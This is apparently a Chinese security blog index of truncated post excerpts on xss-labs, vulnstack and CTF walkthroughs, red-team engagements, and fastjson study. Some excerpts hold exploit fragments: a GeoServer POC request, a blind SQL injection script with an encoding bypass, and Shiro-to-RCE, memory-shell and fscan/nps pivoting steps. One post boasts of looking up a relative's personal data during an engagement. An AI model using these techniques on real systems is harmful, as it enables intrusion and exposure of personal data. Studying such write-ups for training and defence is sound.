c0ll4r

background:昨天看了下网鼎杯 自己挺菜的 没做出来啥题 我一直也没想着往ctf方面深入 学了点简单无脑的东西 知识储备量也不够 ctf这玩意 知识储备很重要 这一两年也算是在一线rt的队伍里(小地方) rt打到现在我不想打了 感觉学不到上面东西 无非就是那点东西 信息搜集 打点 隧道 横向 用着别人的day 自己真的任何提升都没有 目前我的所有事情已经告一段落了 升学的事情基本是稳了的 今天早上本来是想打算过一遍ruoyi的 想多学学实战的东西 前段时间是计划着过红日靶场 我做完了1 感觉其实真的没啥大的提升 脚本小子罢了 百度看看了下xss的教程 看到t4哥的先知了 他真的好厉害啊 ciscn总决赛的题都参考了他的文章(也可能是同时发现的) 既然rt不想搞 只能搞ctf了 升本之后有大把的时间 包括现在我还有大半年 加油吧 希望能在知识上有所提高 先从xss-lab看起 docker没了真的蛋疼啊 最后搞了个hk的机子 xss-lab镜像vulfocus/xss-labs 用这个经典的靶场 level1 直接打直接弹窗 http://8.210.90.129 ...

background现在的电脑买来都是win11了 虽然我喜欢用win10 但是新机到手是win11 我也不好给他装成win10了 win11的右键很奇怪 要点击“更多选项”才能执行其他操作 很不方便 我以为这是系统特性改不了了 其实是可以改的 参考https://baijiahao.baidu.com/s?id=1799217797207316270&wfr=spider&for=pc 开启旧版右键菜单：reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve恢复windows11新版右键菜单：reg delete "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}" /f

background新电脑配置的差不多了 也不知干什么 然后就是想学习一下常见Java类漏洞的打法 结果docker现在这种情况 真的是无语死了 然后就学学内网吧 搭建参考 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 打点我也尽量黑盒自己去做 不看wp 靶机配置没做什么说明 那就直接三个全开 对着本机c段扫 发现貌似不行 这三个都是默认nat的 参考https://blog.csdn.net/m0_75178803/article/details/136015522 win7双网卡 通本机 win2008，win2k3都接在1交换机上 fscan是真的动不了 goby发现了存活扫不动 后来另一篇文章说要进win7手启phpstudy 登录的时候如果要修改密码 删了虚拟机镜像重新解压再启动 启动不了就重启 要是没网络就新增一个网卡 反正这玩意玄乎的很 启动之后fscan就能扫到了 这里也禁ping了 访问80端口是一个小皮的页面 测了下mysql是root root 开了3306但是上不去 扫了下路径发现有货 ...

background那年 我17 因为热爱与梦想 我去了某个比赛 认识了后面一直在指引我的t4哥 那年10月 我睡在黄浦江边的长凳上 江风刺骨 四年后 我谈了恋爱 有了些收入 也不再像当时那样落魄 拿起当年的玩具 思绪又回到了当年 买了个新壳子 内存卡现在也是真便宜 上了个64gb的 安装这玩意就跟电脑一样的 https://shumeipai.nxez.com/download#os 安装专门的烧录软件Raspberry Pi Imager(以前没用过 这个可以在烧录系统的时候就修改一些设置 很方便) 安装系统 https://downloads.raspberrypi.org/raspios_arm64_latest 烧录即可 选择支持ssh 配置好热点信息 ssh上去即可 换源 sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.listsed -i 's/security.debian.org/mirrors.aliyun.com/g' /etc/apt ...

background一次地区的hw 规模很小 记录一下主要是这个洞利用起来有点意思 再有就是 这是我hw这么久以来打出的最具有价值的漏洞 几千万的数据 离谱到啥程度呢 直接在里面给我对象奶奶的三要素给查出来了 打点开局是很朴实无华的弱口令 进的后台 a.com 抓包发现数据是从b.com拉取过来的 后面发现其实cookie也是b.com下发的 直接访问b.com 403 带路径访问也是403 但是我发现路径里有geoserver 于是测一下geoserver的poc 没反应 就没去管了 POST /geoserver/wms HTTP/1.1Content-Type: application/xmlAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateHost: xxx.xxx.xxx.xxxCo ...

background之前的一次打过这个系统 然后发现与之前打的系统是一样的 之前怎么打进去的呢？是别人iis短文件名泄露拿的源码审的洞。至于poc啊，我也没有啊，报告里也没写全这个poc。但是好在有路径，但是数据包我是真看不懂，一堆啥玩意啊，他报告里也没写，就标了个漏洞点的函数。那只能我自己试试了，然后我才知道，虽然能直接上aspx的木马，是解释型语言，但是这玩意同样要编码，直接是看不到源码的，得反编译一下。从来没接触过，只能试试，用的ilspy。 路由追踪web页面的触发点和路径已经有了 现在就是不知道需要提交什么样的参数 打开对应的asmx页面 发现啥也没有 东西都在app_code里面去了 然后类名也有了 直接反编译这个dll 找到对应的类 点开这个箭头里面有一大堆类 找到了 然后发现这里是走了DESDeCode 直接进到CsSubDes里去看 这里就是常规的DES解密 秘钥都有了 然后就手扣报告里的数据拿去解密 需要解密出来的结果是900 因为最终要走SubUpLoadImage实现文件上传 死活解不出来 其实是我只放了key却忽略了iv 这里的key和i ...

没啥好说的 直接上exp 为啥不过完全呢 因为只执行了一个内置函数 至于怎么select数据出来 我不知道 这里是挖洞 跑个user()就行了 不需要进一步利用 其实就是把关键字进行一次url全编码 然后再编码一次 user()使用CURRENT_USER()替换了 import requestsfrom urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)import timewords=''payload=f"name=1%27%29or%2F**%2F%28%40%40version_compile_os%29+like+%27{words}%25%27--+"chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\&quo ...

一直以来都想做一个很完善的平台 能hw 能ctf 能awd 能awdp…… 还想要炫酷的大屏 实时展示 docker很好用 但是之前弄ssrf的时候都是单独起一个redis 一下子起两个容器 平台上面不好启 平台一次只能启一个容器 并且网络配置也有问题 一般都是用docker-compose去启 最好的是docker in docker 这样子问题就很好解决了

总共需要拿到6个flag shiro反序列化打开一看这个remember me就像是shiro 利用工具下载地址： https://github.com/SummerSec/ShiroAttack2/releases 用工具检测了一下发现是shiro框架 爆破找到了秘钥 然后爆破一下利用链和回显地址 成功rce flag在env里 直接打个内存马 查看发现是单网卡机器 传个fscan上去扫一下 fscan下载地址 https://github.com/shadow1ng/fscan/releases 给fscan权限 chmod 777 fscan_amd64 扫一下c段 ./fscan_amd64 -h 172.16.238.10/24 这里先用nps搭个代理 代理工具下载地址 https://github.com/ehang-io/nps/releases 下这两个文件 一个是客户端的 一个是服务端的 使用教程 https://github.com/ehang-io/nps/blob/master/README_zh.md 其中conf文件夹下的nps.con ...

这里主要想写一下fastjson这类万金油漏洞的具体打法 主要也是学习一些java的知识。对这个漏洞的停留我也只是停留在扫描器扫描 然后网上随便复制个poc直接打 迄今为止我也没复现成功过这玩意 所以想着先复现一次rce 然后跟两篇高质量文章 但估计也跟不完 明天还是得给客户完善一下答辩的事情 唉 好难 vulhub-1.2.24用插件直接扫能发现洞 会自动检测所有数据包 然后进行探测 https://github.com/pmiaowu/BurpFastJsonScan/releases 漏洞分析文章 https://forum.butian.net/share/3055 https://forum.butian.net/share/3096 fastjson的序列化与反序列化package org.example;import com.alibaba.fastjson.JSON;public class Main { public static void main(String[] args) { // 将一个 Java 对象序列化为 ...